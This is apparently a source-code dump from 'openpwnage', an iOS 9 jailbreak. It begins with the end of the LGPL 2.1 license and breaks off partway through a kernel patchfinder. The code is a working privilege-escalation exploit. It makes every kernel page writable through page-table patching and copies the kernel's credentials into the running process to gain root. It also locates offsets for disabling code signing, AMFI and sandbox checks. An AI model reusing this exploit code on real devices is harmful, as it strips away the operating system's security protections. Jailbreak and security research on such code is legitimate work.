432 | of all derivatives of our free software and of promoting the sharing
433 | and reuse of software generally.
434 | 
435 |                             NO WARRANTY
436 | 
437 |   15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO
438 | WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW.
439 | EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
440 | OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY
441 | KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
442 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
443 | PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE
444 | LIBRARY IS WITH YOU.  SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME
445 | THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
446 | 
447 |   16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN
448 | WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY
449 | AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU
450 | FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR
451 | CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE
452 | LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING
453 | RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A
454 | FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF
455 | SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
456 | DAMAGES.
457 | 
458 |                      END OF TERMS AND CONDITIONS
459 | 
460 |            How to Apply These Terms to Your New Libraries
461 | 
462 |   If you develop a new library, and you want it to be of the greatest
463 | possible use to the public, we recommend making it free software that
464 | everyone can redistribute and change.  You can do so by permitting
465 | redistribution under these terms (or, alternatively, under the terms of the
466 | ordinary General Public License).
467 | 
468 |   To apply these terms, attach the following notices to the library.  It is
469 | safest to attach them to the start of each source file to most effectively
470 | convey the exclusion of warranty; and each file should have at least the
471 | "copyright" line and a pointer to where the full notice is found.
472 | 
473 |     <one line to give the library's name and a brief idea of what it does.>
474 |     Copyright (C) <year>  <name of author>
475 | 
476 |     This library is free software; you can redistribute it and/or
477 |     modify it under the terms of the GNU Lesser General Public
478 |     License as published by the Free Software Foundation; either
479 |     version 2.1 of the License, or (at your option) any later version.
480 | 
481 |     This library is distributed in the hope that it will be useful,
482 |     but WITHOUT ANY WARRANTY; without even the implied warranty of
483 |     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
484 |     Lesser General Public License for more details.
485 | 
486 |     You should have received a copy of the GNU Lesser General Public
487 |     License along with this library; if not, write to the Free Software
488 |     Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301
489 |     USA
490 | 
491 | Also add information on how to contact you by electronic and paper mail.
492 | 
493 | You should also get your employer (if you work as a programmer) or your
494 | school, if any, to sign a "copyright disclaimer" for the library, if
495 | necessary.  Here is a sample; alter the names:
496 | 
497 |   Yoyodyne, Inc., hereby disclaims all copyright interest in the
498 |   library `Frob' (a library for tweaking knobs) written by James Random
499 |   Hacker.
500 | 
501 |   <signature of Ty Coon>, 1 April 1990
502 |   Ty Coon, President of Vice
503 | 
504 | That's all there is to it!


--------------------------------------------------------------------------------
/openpwnage/LGPL/kpmapAndCo.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  kpmapAndCo.h
 3 | //  openpwnage
 4 | //
 5 | //  Created by Zachary Keffaber on 6/15/22.
 6 | //
 7 | 
 8 | #ifndef kpmapAndCo_h
 9 | #define kpmapAndCo_h
10 | 
11 | void patch_kernel_pmap(tfp0, kernel_base);
12 | void pmap_unpatch(task_t tfp0);
13 | bool is_pmap_patch_success(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide);
14 | bool rootify(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide);
15 | void run_cmd(char *cmd, ...);
16 | 
17 | #endif /* kpmapAndCo_h */
18 | 


--------------------------------------------------------------------------------
/openpwnage/LGPL/kpmapAndCo.m:
--------------------------------------------------------------------------------
  1 | //kpmap patch from jk
  2 | 
  3 | #import <Foundation/Foundation.h>
  4 | #include <mach/mach.h>
  5 | #include <sys/types.h>
  6 | #include <sys/utsname.h>
  7 | #include <UIKit/UIKit.h>
  8 | #include <sys/mount.h>
  9 | #include <spawn.h>
 10 | #include <copyfile.h>
 11 | #include <sys/sysctl.h>
 12 | #include <sys/stat.h>
 13 | #include "../jailbreak.h"
 14 | 
 15 | #define TTB_SIZE			4096
 16 | #define L1_SECT_S_BIT		(1 << 16)
 17 | #define L1_SECT_PROTO		(1 << 1)														/* 0b10 */
 18 | #define L1_SECT_AP_URW		(1 << 10) | (1 << 11)
 19 | #define L1_SECT_APX			(1 << 15)
 20 | #define L1_SECT_DEFPROT		(L1_SECT_AP_URW | L1_SECT_APX)
 21 | #define L1_SECT_SORDER		(0)																/* 0b00, not cacheable, strongly ordered. */
 22 | #define L1_SECT_DEFCACHE	(L1_SECT_SORDER)
 23 | #define L1_PROTO_TTE(entry)	(entry | L1_SECT_S_BIT | L1_SECT_DEFPROT | L1_SECT_DEFCACHE)
 24 | 
 25 | uint32_t pmaps[TTB_SIZE];
 26 | int pmapscnt = 0;
 27 | 
 28 | void patch_kernel_pmap(task_t tfp0, uintptr_t kernel_base) {
 29 | 	uint32_t kernel_pmap		= find_kernel_pmap(kernel_base);
 30 | 	uint32_t kernel_pmap_store	= kread_uint32(kernel_pmap,tfp0);
 31 | 	uint32_t tte_virt			= kread_uint32(kernel_pmap_store,tfp0);
 32 | 	uint32_t tte_phys			= kread_uint32(kernel_pmap_store+4,tfp0);
 33 | 	
 34 | 	olog("kernel pmap store @ 0x%08x\n",
 35 | 			kernel_pmap_store);
 36 | 	olog("kernel pmap tte is at VA 0x%08x PA 0x%08x\n",
 37 | 			tte_virt,
 38 | 			tte_phys);
 39 | 	
 40 | 	/*
 41 | 	 *  every page is writable
 42 | 	 */
 43 | 	uint32_t i;
 44 | 	for (i = 0; i < TTB_SIZE; i++) {
 45 | 		uint32_t addr   = tte_virt + (i << 2);
 46 | 		uint32_t entry  = kread_uint32(addr,tfp0);
 47 | 		if (entry == 0) continue;
 48 | 		if ((entry & 0x3) == 1) {
 49 | 			/*
 50 | 			 *  if the 2 lsb are 1 that means there is a second level
 51 | 			 *  pagetable that we need to give readwrite access to.
 52 | 			 *  zero bytes 0-10 to get the pagetable address
 53 | 			 */
 54 | 			uint32_t second_level_page_addr = (entry & (~0x3ff)) - tte_phys + tte_virt;
 55 | 			for (int i = 0; i < 256; i++) {
 56 | 				/*
 57 | 				 *  second level pagetable has 256 entries, we need to patch all
 58 | 				 *  of them
 59 | 				 */
 60 | 				uint32_t sladdr  = second_level_page_addr+(i<<2);
 61 | 				uint32_t slentry = kread_uint32(sladdr,tfp0);
 62 | 				
 63 | 				if (slentry == 0)
 64 | 					continue;
 65 | 				
 66 | 				/*
 67 | 				 *  set the 9th bit to zero
 68 | 				 */
 69 | 				uint32_t new_entry = slentry & (~0x200);
 70 | 				if (slentry != new_entry) {
 71 | 					kwrite_uint32(sladdr, new_entry,tfp0);
 72 | 					pmaps[pmapscnt++] = sladdr;
 73 | 				}
 74 | 			}
 75 | 			continue;
 76 | 		}
 77 | 		
 78 | 		if ((entry & L1_SECT_PROTO) == 2) {
 79 | 			uint32_t new_entry  =  L1_PROTO_TTE(entry);
 80 | 			new_entry		   &= ~L1_SECT_APX;
 81 | 			kwrite_uint32(addr, new_entry,tfp0);
 82 | 		}
 83 | 	}
 84 | 	
 85 | 	olog("every page is actually writable\n");
 86 | 	usleep(100000);
 87 | }
 88 | 
 89 | void pmap_unpatch(task_t tfp0) {
 90 | 	while (pmapscnt > 0) {
 91 | 		uint32_t sladdr  = pmaps[--pmapscnt];
 92 | 		uint32_t slentry = kread_uint32(sladdr,tfp0);
 93 | 		
 94 | 		/*
 95 | 		 *  set the 9th bit to one
 96 | 		 */
 97 | 		uint32_t new_entry = slentry | (0x200);
 98 | 		kwrite_uint32(sladdr, new_entry,tfp0);
 99 | 	}
100 | }
101 | 
102 | bool is_pmap_patch_success(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide) {
103 |     
104 |     patch_kernel_pmap(tfp0, kernel_base);
105 |     
106 |     uint32_t before = -1;
107 |     uint32_t after = -1;
108 |     
109 |     olog("check pmap patch\n");
110 |     
111 |     before = kread_uint32(kernel_base, tfp0);
112 |     kwrite_uint32(kernel_base, 0x41414141, tfp0);
113 |     after = kread_uint32(kernel_base, tfp0);
114 |     kwrite_uint32(kernel_base, before, tfp0);
115 |     
116 |     if ((before != after) && (after == 0x41414141)) {
117 |         olog("pmap patched!\n");
118 |     } else {
119 |         olog("pmap patch failed\n");
120 |         return false;
121 |     }
122 |     return true;
123 | }
124 | 
125 | bool rootify(task_t tfp0, uintptr_t kernel_base, uintptr_t kaslr_slide){
126 |     olog("stealing kernel creds\n");
127 |     
128 |     uint32_t proc = kread_uint32(kernel_base + hardcoded_allproc(), tfp0);
129 |     olog("uint32_t allproc at 0x%08lx\n",kernel_base + hardcoded_allproc());
130 |     
131 |     uint32_t myproc = 0;
132 |     uint32_t kernproc = 0;
133 |     
134 |     //thanks to Jake James for his rootlessJB writeup, plus spv. this was already in 9.3.5fun and while i can easily redo this to be my own eh I'm lazy and spv's works fine.
135 |     if (proc != 0) {
136 |         while ((myproc == 0) || (kernproc == 0)) {
137 |             uint32_t kpid = kread_uint32(proc + 8, tfp0); //go to next process
138 |             if (kpid == getpid()) {
139 |                 myproc = proc;
140 |                 olog("found myproc 0x%08x, %d\n", myproc, kpid);
141 |             } else if (kpid == 0) {
142 |                 kernproc = proc;
143 |                 olog("found kernproc 0x%08x, %d\n", kernproc, kpid);
144 |             }
145 |             proc = kread_uint32(proc, tfp0);
146 |         }
147 |     } else {
148 |         // fail
149 |         return false;
150 |     }
151 |     
152 |     uint32_t proc_ucred_offset;
153 |     if ([[NSArray arrayWithObjects:@"3248.61.1~1",@"3248.60.9~1",@"3248.60.8~1",@"3248.60.4~1",@"3248.60.3~3",@"3248.50.21~4",@"3248.50.20~1",@"3248.50.18~1",@"3248.41.4~2",@"3248.41.4~3",@"3248.41.3~1",@"3248.40.173.0.1~1",@"3248.40.166.0.1~1",@"3248.40.155.1.1~3", nil] containsObject:KernelVersion()]) { //9.3b1-9.3.6
154 |         proc_ucred_offset = 0xa4;
155 |         olog("using 0xa4\n");
156 |     } else if ([[NSArray arrayWithObjects:@"3248.31.3~2",@"3248.21.2~1",@"3248.21.1~2",@"3248.20.39~8",@"3248.20.33.0.1~7",@"3248.10.42~4",@"3248.10.41~1",@"3248.10.38~3",@"3248.10.27~1",@"3789.70.16~4", nil] containsObject:KernelVersion()]){ //9.1b1-9.2.1 & 10.3.3
157 |         proc_ucred_offset = 0x98;
158 |         olog("using 0x98\n");
159 |     } else { //iOS 9.0b1-9.0.2 (and I think 8.4.1 too)
160 |         proc_ucred_offset = 0x8c;
161 |         olog("using 0x8c\n");
162 |     }
163 |     
164 |     uint32_t kern_ucred = kread_uint32(kernproc + proc_ucred_offset, tfp0);
165 |     olog("uint32_t kern_ucred at 0x%08x\n", kern_ucred);
166 |     
167 |     vm_write(tfp0,myproc + proc_ucred_offset,(vm_offset_t)&kern_ucred,4); //patch our ucred with kern ucred
168 |     
169 |     setuid(0);
170 |     
171 |     olog("got root\n");
172 |     
173 |     return true;
174 | 
175 | }
176 | 
177 | extern char **environ;
178 | 
179 | //eh fuck it I'm lazy, later in a future build this won't be used
180 | void run_cmd(char *cmd, ...) {
181 | 	pid_t pid;
182 | 	va_list ap;
183 | 	char* cmd_ = NULL;
184 | 	
185 | 	va_start(ap, cmd);
186 | 	vasprintf(&cmd_, cmd, ap);
187 | 	
188 | 	char *argv[] = {"sh", "-c", cmd_, NULL};
189 | 	
190 | 	int status;
191 | 	olog("Run command: %s", cmd_);
192 | 	status = posix_spawn(&pid, "/bin/sh", NULL, NULL, argv, environ);
193 | 	if (status == 0) {
194 | 		olog("Child pid: %i", pid);
195 | 		do {
196 | 			if (waitpid(pid, &status, 0) != -1) {
197 | 				olog("Child status %d", WEXITSTATUS(status));
198 | 			} else {
199 | 				perror("waitpid");
200 | 			}
201 | 		} while (!WIFEXITED(status) && !WIFSIGNALED(status));
202 | 	} else {
203 | 		olog("posix_spawn: %s", strerror(status));
204 | 	}
205 | }
206 | 


--------------------------------------------------------------------------------
/openpwnage/LGPL/patchfinder.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |  *  this is a patchfinder
 3 |  *  but bad
 4 |  */
 5 | 
 6 | #ifndef patchfinder_h
 7 | #define patchfinder_h
 8 | 
 9 | struct offsets_t {
10 |     uint32_t mount_common;
11 |     uint32_t lwvm1;
12 |     uint32_t lwvm2;
13 |     uint32_t lwvm_call;
14 |     uint32_t lwvm_call_offset;
15 |     uint32_t sbops;
16 |     uint32_t substrate1;
17 |     uint32_t substrate2;
18 |     uint32_t proc_enforce;
19 |     uint32_t cs_enforcement_disable_amfi;
20 |     uint32_t PE_i_can_has_debugger_1;
21 |     uint32_t PE_i_can_has_debugger_2;
22 |     uint32_t PE_i_can_has_debugger_offset;
23 |     uint32_t vm_fault_enter_patch;
24 |     uint32_t vm_map_enter_patch;
25 |     uint32_t csops;
26 |     uint32_t mapForIO;
27 |     uint32_t sandbox_call_i_can_has_debugger;
28 |     uint32_t amfi_file_check_mmap;
29 |     uint32_t allproc;
30 |     uint32_t tfp0;
31 | };
32 | 
33 | uint32_t    find_lwvm1                                (uint32_t region, uint8_t* kdata, size_t ksize, char* version);
34 | uint32_t    find_lwvm2                                (uint32_t region, uint8_t* kdata, size_t ksize, char* version);
35 | uint32_t    find_lwvm_call                            (uint32_t region, uint8_t* kdata, size_t ksize);
36 | uint32_t    find_lwvm_call_offset                    (uint32_t region, uint8_t* kdata, size_t ksize);
37 | uint32_t    find_substrate1                            (uint32_t region, uint8_t* kdata, size_t ksize);
38 | uint32_t    find_substrate2                            (uint32_t region, uint8_t* kdata, size_t ksize);
39 | uint32_t*    find_substrate1_and_2                    (uint32_t region, uint8_t* kdata, size_t ksize, char* version);
40 | uint32_t    find_proc_enforce                        (uint32_t region, uint8_t* kdata, size_t ksize);
41 | uint32_t    find_vm_fault_enter_patch                (uint32_t region, uint8_t* kdata, size_t ksize);
42 | uint32_t    find_vm_map_enter_patch                    (uint32_t region, uint8_t* kdata, size_t ksize);
43 | uint32_t    find_csops                                (uint32_t region, uint8_t* kdata, size_t ksize);
44 | uint32_t    find_mapForIO                            (uint32_t region, uint8_t* kdata, size_t ksize);
45 | uint32_t    find_sandbox_call_i_can_has_debugger    (uint32_t region, uint8_t* kdata, size_t ksize);
46 | uint32_t    find_amfi_file_check_mmap                (uint32_t region, uint8_t* kdata, size_t ksize);
47 | uint32_t    find_allproc                            (uint32_t region, uint8_t* kdata, size_t ksize, char* version);
48 | uint32_t    find_tfp0                                (uint32_t region, uint8_t* kdata, size_t ksize, char* version);
49 | uint32_t find_sbops(uint32_t region, uint8_t* kdata, size_t ksize);
50 | uint32_t find_mount_common(uint32_t region, uint8_t* kdata, size_t ksize);
51 | uint32_t find_cs_enforcement_disable_amfi(uint32_t region, uint8_t* kdata, size_t ksize);
52 | 
53 | #endif /* patchfinder_h */
54 | 


--------------------------------------------------------------------------------
/openpwnage/LGPL/patchfinder.m:
--------------------------------------------------------------------------------
  1 | //iOS 9 patchfinder is by spv
  2 | 
  3 | #include <stdint.h>
  4 | #include <stdlib.h>
  5 | #include <string.h>
  6 | #include <stdio.h>
  7 | #include "patchfinder.h"
  8 | #include "../jailbreak.h"
  9 | #include <UIKit/UIKit.h>
 10 | 
 11 | /*
 12 |  *  iOS 9 only right now
 13 |  */
 14 | 
 15 | #define IS_IOS_9 1
 16 | 
 17 | static uint32_t bit_range(uint32_t x, int start, int end) {
 18 |     x = (x << (31 - start)) >> (31 - start);
 19 |     x = (x >> end);
 20 |     return x;
 21 | }
 22 | 
 23 | static uint32_t ror(uint32_t x, int places) {
 24 |     return (x >> places) | (x << (32 - places));
 25 | }
 26 | 
 27 | static int thumb_expand_imm_c(uint16_t imm12) {
 28 |     if (bit_range(imm12, 11, 10) == 0) {
 29 |         switch (bit_range(imm12, 9, 8)) {
 30 |             case 0:
 31 |                 return bit_range(imm12, 7, 0);
 32 |             case 1:
 33 |                 return (bit_range(imm12, 7, 0) << 16) | bit_range(imm12, 7, 0);
 34 |             case 2:
 35 |                 return (bit_range(imm12, 7, 0) << 24) | (bit_range(imm12, 7, 0) << 8);
 36 |             case 3:
 37 |                 return (bit_range(imm12, 7, 0) << 24) | (bit_range(imm12, 7, 0) << 16) | (bit_range(imm12, 7, 0) << 8) | bit_range(imm12, 7, 0);
 38 |             default:
 39 |                 return 0;
 40 |         }
 41 |     } else {
 42 |         uint32_t unrotated_value = 0x80 | bit_range(imm12, 6, 0);
 43 |         return ror(unrotated_value, bit_range(imm12, 11, 7));
 44 |     }
 45 | }
 46 | 
 47 | static int insn_is_32bit(uint16_t* i) {
 48 |     return (*i & 0xe000) == 0xe000 && (*i & 0x1800) != 0x0;
 49 | }
 50 | 
 51 | static int insn_is_ldr_literal(uint16_t* i) {
 52 |     return (*i & 0xF800) == 0x4800 || (*i & 0xFF7F) == 0xF85F;
 53 | }
 54 | 
 55 | static int insn_ldr_literal_rt(uint16_t* i) {
 56 |     if ((*i & 0xF800) == 0x4800) {
 57 |         return (*i >> 8) & 7;
 58 |     } else if ((*i & 0xFF7F) == 0xF85F) {
 59 |         return (*(i + 1) >> 12) & 0xF;
 60 |     } else {
 61 |         return 0;
 62 |     }
 63 | }
 64 | 
 65 | static int insn_ldr_literal_imm(uint16_t* i) {
 66 |     if ((*i & 0xF800) == 0x4800) {
 67 |         return (*i & 0xFF) << 2;
 68 |     } else if ((*i & 0xFF7F) == 0xF85F) {
 69 |         return (*(i + 1) & 0xFFF) * (((*i & 0x0800) == 0x0800) ? 1 : -1);
 70 |     } else {
 71 |         return 0;
 72 |     }
 73 | }
 74 | 
 75 | int insn_ldr_reg_rt(uint16_t* i) {
 76 |     if ((*i & 0xFE00) == 0x5800) {
 77 |         return *i & 0x7;
 78 |     } else if ((*i & 0xFFF0) == 0xF850 && (*(i + 1) & 0x0FC0) == 0x0000) {
 79 |         return (*(i + 1) >> 12) & 0xF;
 80 |     } else {
 81 |         return 0;
 82 |     }
 83 | }
 84 | 
 85 | int insn_ldr_reg_rm(uint16_t* i) {
 86 |     if ((*i & 0xFE00) == 0x5800) {
 87 |         return (*i >> 6) & 0x7;
 88 |     } else if ((*i & 0xFFF0) == 0xF850 && (*(i + 1) & 0x0FC0) == 0x0000) {
 89 |         return *(i + 1) & 0xF;
 90 |     } else {
 91 |         return 0;
 92 |     }
 93 | }
 94 | 
 95 | static int insn_is_add_reg(uint16_t* i) {
 96 |     if ((*i & 0xFE00) == 0x1800) {
 97 |         return 1;
 98 |     } else if ((*i & 0xFF00) == 0x4400) {
 99 |         return 1;
100 |     } else if ((*i & 0xFFE0) == 0xEB00) {
101 |         return 1;
102 |     } else {
103 |         return 0;
104 |     }
105 | }
106 | 
107 | static int insn_add_reg_rd(uint16_t* i) {
108 |     if ((*i & 0xFE00) == 0x1800) {
109 |         return (*i & 7);
110 |     } else if ((*i & 0xFF00) == 0x4400) {
111 |         return (*i & 7) | ((*i & 0x80) >> 4);
112 |     } else if ((*i & 0xFFE0) == 0xEB00) {
113 |         return (*(i + 1) >> 8) & 0xF;
114 |     } else {
115 |         return 0;
116 |     }
117 | }
118 | 
119 | static int insn_add_reg_rn(uint16_t* i) {
120 |     if ((*i & 0xFE00) == 0x1800) {
121 |         return ((*i >> 3) & 7);
122 |     } else if ((*i & 0xFF00) == 0x4400) {
123 |         return (*i & 7) | ((*i & 0x80) >> 4);
124 |     } else if ((*i & 0xFFE0) == 0xEB00) {
125 |         return (*i & 0xF);
126 |     } else {
127 |         return 0;
128 |     }
129 | }
130 | 
131 | static int insn_add_reg_rm(uint16_t* i) {
132 |     if ((*i & 0xFE00) == 0x1800) {
133 |         return (*i >> 6) & 7;
134 |     } else if ((*i & 0xFF00) == 0x4400) {
135 |         return (*i >> 3) & 0xF;
136 |     } else if ((*i & 0xFFE0) == 0xEB00) {
137 |         return *(i + 1) & 0xF;
138 |     } else {
139 |         return 0;
140 |     }
141 | }
142 | 
143 | static int insn_is_movt(uint16_t* i) {
144 |     return (*i & 0xFBF0) == 0xF2C0 && (*(i + 1) & 0x8000) == 0;
145 | }
146 | 
147 | static int insn_movt_rd(uint16_t* i) {
148 |     return (*(i + 1) >> 8) & 0xF;
149 | }
150 | 
151 | static int insn_movt_imm(uint16_t* i) {
152 |     return ((*i & 0xF) << 12) | ((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF);
153 | }
154 | 
155 | static int insn_is_mov_imm(uint16_t* i) {
156 |     if ((*i & 0xF800) == 0x2000) {
157 |         return 1;
158 |     } else if ((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0) {
159 |         return 1;
160 |     } else if ((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0) {
161 |         return 1;
162 |     } else {
163 |         return 0;
164 |     }
165 | }
166 | 
167 | static int insn_mov_imm_rd(uint16_t* i) {
168 |     if ((*i & 0xF800) == 0x2000) {
169 |         return (*i >> 8) & 7;
170 |     } else if ((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0) {
171 |         return (*(i + 1) >> 8) & 0xF;
172 |     } else if ((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0) {
173 |         return (*(i + 1) >> 8) & 0xF;
174 |     } else {
175 |         return 0;
176 |     }
177 | }
178 | 
179 | static int insn_mov_imm_imm(uint16_t* i) {
180 |     if ((*i & 0xF800) == 0x2000) {
181 |         return *i & 0xF;
182 |     } else if ((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0) {
183 |         return thumb_expand_imm_c(((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF));
184 |     } else if ((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0) {
185 |         return ((*i & 0xF) << 12) | ((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF);
186 |     } else {
187 |         return 0;
188 |     }
189 | }
190 | 
191 | // Find PC-relative references to a certain address (relative to kdata). This is basically a virtual machine that only cares about instructions used in PC-relative addressing, so no branches, etc.
192 | static uint16_t* find_literal_ref(uint32_t region, uint8_t* kdata, size_t ksize, uint16_t* insn, uint32_t address) {
193 |     uint16_t* current_instruction = insn;
194 |     uint32_t value[16];
195 |     memset(value, 0, sizeof(value));
196 | 
197 |     while ((uintptr_t)current_instruction < (uintptr_t)(kdata + ksize)) {
198 |         if (insn_is_mov_imm(current_instruction)) {
199 |             value[insn_mov_imm_rd(current_instruction)] = insn_mov_imm_imm(current_instruction);
200 |         } else if (insn_is_ldr_literal(current_instruction)) {
201 |             uintptr_t literal_address  = (uintptr_t)kdata + ((((uintptr_t)current_instruction - (uintptr_t)kdata) + 4) & 0xFFFFFFFC) + insn_ldr_literal_imm(current_instruction);
202 |             if (literal_address >= (uintptr_t)kdata && (literal_address + 4) <= ((uintptr_t)kdata + ksize)) {
203 |                 value[insn_ldr_literal_rt(current_instruction)] = *(uint32_t*)(literal_address);
204 |             }
205 |         } else if (insn_is_movt(current_instruction)) {
206 |             int reg = insn_movt_rd(current_instruction);
207 |             value[reg] |= insn_movt_imm(current_instruction) << 16;
208 |             if (value[reg] == address) {
209 |                 return current_instruction;
210 |             }
211 |         } else if (insn_is_add_reg(current_instruction)) {
212 |             int reg = insn_add_reg_rd(current_instruction);
213 |             if (insn_add_reg_rm(current_instruction) == 15 && insn_add_reg_rn(current_instruction) == reg) {
214 |                 value[reg] += ((uintptr_t)current_instruction - (uintptr_t)kdata) + 4;
215 |                 if (value[reg] == address) {
216 |                     return current_instruction;
217 |                 }
218 |             }
219 |         }
220 | 
221 |         current_instruction += insn_is_32bit(current_instruction) ? 2 : 1;
222 |     }
223 | 
224 |     return NULL;
225 | }
226 | 
227 | struct find_search_mask {
228 |     uint16_t mask;
229 |     uint16_t value;
230 | };
231 | 
232 | // Search the range of kdata for a series of 16-bit values that match the search mask.
233 | static uint16_t* find_with_search_mask(uint32_t region, uint8_t* kdata, size_t ksize, int num_masks, const struct find_search_mask* masks) {
234 |     uint16_t* end = (uint16_t*)(kdata + ksize - (num_masks * sizeof(uint16_t)));
235 |     uint16_t* cur;
236 |     for (cur = (uint16_t*)kdata; cur <= end; cur++) {
237 |         int matched = 1;
238 |         int i;
239 |         for (i = 0; i < num_masks; i++) {
240 |             if ((*(cur + i) & masks[i].mask) != masks[i].value) {
241 |                 matched = 0;
242 |                 break;
243 |             }
244 |         }
245 | 
246 |         if (matched)
247 |             return cur;
248 |     }
249 | 
250 |     return NULL;
251 | }
252 | 
253 | uint32_t find_lwvm1(uint32_t region, uint8_t* kdata, size_t ksize, char* version) {
254 |     float version_float = strtof(version, 0);
255 |     for (uint32_t i = 0; i < ksize; i++) {
256 |         if (version_float == (float)9.3) {
257 |             if (*(uint64_t*)&kdata[i] == 0x2501d1030f01f01b && *(uint32_t*)&kdata[i+0x8] == 0x2501e016) {
258 |                 uint32_t lwvm1 = i - 0x10;
259 |                 printf("[*] found lwvm1: 0x%08x\n", lwvm1);
260 |                 return lwvm1;
261 |             }
262 |         } else if (version_float == (float)9.0) {
263 |             if ((*(uint64_t*)&kdata[i] & 0x00ffffffffffffff) == 0xd4d0060f01f010) {
264 |                 uint32_t lwvm1 = i - 0x10;
265 |                 printf("[*] found lwvm1: 0x%08x\n", lwvm1);
266 |                 return lwvm1;
267 |             }
268 |         } else {
269 |             if (*(uint32_t*)&kdata[i] == 0x0f01f010 && *(uint8_t*)&kdata[i+0x5] == 0xd0 && *(uint32_t*)&kdata[i+0xe] == 0x0f40f010 && *(uint8_t*)&kdata[i+0x13] == 0xd0) {
270 |                 uint32_t lwvm1 = i - 0x10;
271 |                 printf("[*] found lwvm1: 0x%08x\n", lwvm1);
272 |                 return lwvm1;
273 |             }
274 |         }
275 |     }
276 |     return -1;
277 | }
278 | 
279 | uint32_t find_lwvm2(uint32_t region, uint8_t* kdata, size_t ksize, char* version) {
280 |     float version_float = strtof(version, 0);
281 |     for (uint32_t i = 0; i < ksize; i++) {
282 |         if (version_float == (float)9.3) {
283 |             if (*(uint64_t*)&kdata[i] == 0x2501d1030f01f01b && *(uint32_t*)&kdata[i+0x8] == 0x2501e016) {
284 |                 uint32_t lwvm2 = i + 0x4;
285 |                 printf("[*] found lwvm2: 0x%08x\n", lwvm2);
286 |                 return lwvm2;
287 |             }
288 |         } else if (version_float == (float)9.0) {
289 |             if ((*(uint64_t*)&kdata[i] & 0x00ffffffffffffff) == 0xd4d0060f01f010) {
290 |                 uint32_t lwvm2 = i + 0x4;
291 |                 printf("[*] found lwvm2: 0x%08x\n", lwvm2);
292 |                 return lwvm2;
293 |             }
294 |         } else {
295 |             if (*(uint32_t*)&kdata[i] == 0x0f01f010 && *(uint8_t*)&kdata[i+0x5] == 0xd0 && *(uint32_t*)&kdata[i+0xe] == 0x0f40f010 && *(uint8_t*)&kdata[i+0x13] == 0xd0) {
296 |                 uint32_t lwvm2 = i + 0x4;
297 |                 printf("[*] found lwvm2: 0x%08x\n", lwvm2);
298 |                 return lwvm2;
299 |             }
300 |         }
301 |     }
302 |     return -1;
303 | }
304 | 
305 | uint32_t find_lwvm_call(uint32_t region, uint8_t* kdata, size_t ksize) {
306 |     char* faceable = memmem(kdata, ksize, "\xce\xab\x1e\xef\xfa\xce\xab\x1e", 8);
307 |     if (!faceable)
308 |         return -1;
309 |     char* lwvm_call_pointer = faceable + 0x78;
310 |     uint32_t lwvm_call = (uintptr_t)lwvm_call_pointer - (uintptr_t)kdata;
311 |     olog("[*] found lwvm_call: 0x%08x\n", lwvm_call);
312 |     return lwvm_call;
313 | }
314 | 
315 | uint32_t find_lwvm_call_offset(uint32_t region, uint8_t* kdata, size_t ksize) {
316 |     for (uint32_t i = 0; i < ksize; i += 2) {
317 |         if (*(uint64_t*)&kdata[i] == 0xf010798044406da0 && *(uint32_t*)&kdata[i+0x8] == 0xd0060f01 && *(uint16_t*)&kdata[i+0xC] == 0x4620) {
318 |             uint32_t lwvm_call_offset = i + 1;
319 |             olog("[*] found lwvm_call_offset: 0x%08x\n", lwvm_call_offset);
320 |             return lwvm_call_offset;
321 |         }
322 |     }
323 |     return -1;
324 | }
325 | 
326 | uint32_t find_substrate1(uint32_t region, uint8_t* kdata, size_t ksize) {
327 |     for (uint32_t i = 0; i < ksize; i++) {
328 |         if (*(uint64_t*)&kdata[i] == 0x0000f8dabf1e2800 && *(uint32_t*)&kdata[i+0x8] == 0x0004f040) {
329 |             uint32_t substrate1 = i + 0x2 - 0x49000;
330 |             printf("[*] found substrate1: 0x%08x\n", substrate1);
331 |             return substrate1;
332 |         }
333 |     }
334 |     return -1;
335 | }
336 | 
337 | uint32_t find_substrate2(uint32_t region, uint8_t* kdata, size_t ksize) {
338 |     for (uint32_t i = 0; i < ksize; i++) {
